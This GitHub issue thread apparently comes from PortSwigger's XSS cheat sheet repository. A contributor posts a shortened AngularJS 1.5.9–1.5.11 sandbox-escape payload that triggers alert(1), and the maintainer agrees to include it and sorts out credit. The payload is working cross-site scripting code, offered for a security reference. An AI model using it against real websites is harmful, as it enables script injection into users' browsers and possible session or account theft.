### ISSUE TITLE
AngularJS sandbox escapes reflected 

### ISSUE THREAD

**Issue by sp3xsr** [PortSwigger/xss-cheatsheet-data#42]
The Shortened version of angularjs sandbox bypass for version 1.5.9 - 1.5.11
`{{c=''.sub.call;b=''.sub.bind;
c.$apply=$apply;c.$eval=b;
$root.$$phase=null;$root.$digest=$on;
C=c.$apply(c);
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='alert(1)';
astNode.argument={type:'Identifier'};
");
m1=$$asyncQueue.pop().expression;
m2=B(C,null,m1);[].push.apply=m2;$eval('B(b)');}}`

Length 321 
Old one have 517 length

**Comment by hackvertor** [comment]
Wow nice work! That is impressive. I'll add it for the next release

**Comment by hackvertor** [comment]
Could I have your Twitter ID and company name (if applicable)

**Comment by gtesticg** [comment]
> Wow nice work! That is impressive. I'll add it for the next release

Great news ! Thank you.

> Could I have your Twitter ID and company name (if applicable)

Credits :
Lukasz Plonka 
nick "sp3x"

No Company and Twitter ID

Thanks in advance.

**Comment by hackvertor** [comment]
In my haste I didn't verify this different user was in fact the original poster =) please can the original post verify the credits are correct? If I don't hear anything I'll use the Github id cheers

**Comment by hackvertor** [comment]
Oh great thanks for that you have been correctly credited

**Comment by hackvertor** [comment]
Yep will do it will be on the next release
